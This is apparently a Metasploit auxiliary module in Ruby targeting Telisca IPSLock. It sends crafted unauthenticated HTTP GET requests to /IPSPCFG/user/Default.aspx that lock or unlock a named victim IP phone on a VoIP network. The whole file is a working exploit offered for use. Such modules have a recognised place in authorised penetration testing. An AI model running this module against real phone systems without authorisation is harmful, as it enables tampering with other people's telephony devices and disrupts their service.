metasploit-framework/modules/auxiliary/voip/telisca_ips_lock_control.rb

167 lines
4.4 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Telisca IPS Lock Control',
'Description' => %q{
This modules will exploit the vulnerabilities of Telisca IPSLock in order to lock or unlock
IP Phones. You need to be in the voip vlan and you have to know the phone name.
Example : SEP002497AB1D4B.
Set ACTION to either LOCK or UNLOCK. UNLOCK is the default.
},
'References' =>
[
# First publicly known resource
'URL', 'https://github.com/rapid7/metasploit-framework/pull/6470'
],
'Author' =>
[
'Fakhir Karim Reda <karim.fakhir[at]gmail.com>',
'zirsalem'
],
'License' => MSF_LICENSE,
'DisclosureDate' => 'Dec 17 2015',
'Actions' =>
[
['LOCK', 'Description' => 'To lock a phone'],
['UNLOCK', 'Description' => 'To unlock a phone']
],
'DefaultAction' => 'UNLOCK'
))
register_options(
[
OptAddress.new('RHOST', [true, 'The IPS Lock IP Address']),
OptString.new('PHONENAME', [true, 'The name of the victim phone. Ex: SEP002497AB1D4B'])
], self.class)
deregister_options('RHOSTS')
end
def print_status(msg='')
super("#{peer} - #{msg}")
end
def print_good(msg='')
super("#{peer} - #{msg}")
end
def print_error(msg='')
super("#{peer} - #{msg}")
end
# Returns the status of the listening port.
#
# @return [Boolean] TrueClass if port open, otherwise FalseClass.
def port_open?
begin
res = send_request_raw({'method' => 'GET', 'uri' => '/'})
return true if res
rescue ::Rex::ConnectionRefused
vprint_status("Connection refused")
rescue ::Rex::ConnectionError
vprint_error("Connection failed")
rescue ::OpenSSL::SSL::SSLError
vprint_error("SSL/TLS connection error")
end
false
end
# Locks a device.
#
# @param phone_name [String] Name of the phone used for the pn parameter.
#
# @return [void]
def lock(phone_name)
res = send_request_cgi({
'method' => 'GET',
'uri' => '/IPSPCFG/user/Default.aspx',
'headers' => {
'Connection' => 'keep-alive',
'Accept-Language' => 'en-US,en;q=0.5'
},
'vars_get' => {
'action' => 'DO',
'tg' => 'L',
'pn' => phone_name,
'dp' => '',
'gr' => '',
'gl' => ''
}
})
if res && res.code == 200
if res.body.include?('Unlock') || res.body.include?('U7LCK')
print_good("The device #{phone_name} is already locked")
elsif res.body.include?('unlocked') || res.body.include?('Locking') || res.body.include?('QUIT')
print_good("Device #{phone_name} successfully locked")
end
elsif res
print_error("Unexpected response #{res.code}")
else
print_error('The connection timed out while trying to lock.')
end
end
# Unlocks a phone.
#
# @param phone_name [String] Name of the phone used for the pn parameter.
#
# @return [void]
def unlock(phone_name)
res = send_request_cgi({
'method' => 'GET',
'uri' => '/IPSPCFG/user/Default.aspx',
'headers' => {
'Connection' => 'keep-alive',
'Accept-Language' => 'en-US,en;q=0.5'
},
'vars_get' => {
'action' => 'U7LCK',
'pn' => phone_name,
'dp' => ''
}
})
if res && res.code == 200
if res.body.include?('Unlock') || res.body.include?('U7LCK')
print_good("The device #{phone_name} is already locked")
elsif res.body.include?('unlocked') || res.body.include?('QUIT')
print_good("The device #{phone_name} successfully unlocked")
end
elsif res
print_error("Unexpected response #{res.code}")
else
print_error('The connection timed out while trying to unlock')
end
end
def run
unless port_open?
print_error('The web server is unreachable!')
return
end
phone_name = datastore['PHONENAME']
case action.name
when 'LOCK'
lock(phone_name)
when 'UNLOCK'
unlock(phone_name)
end
end
end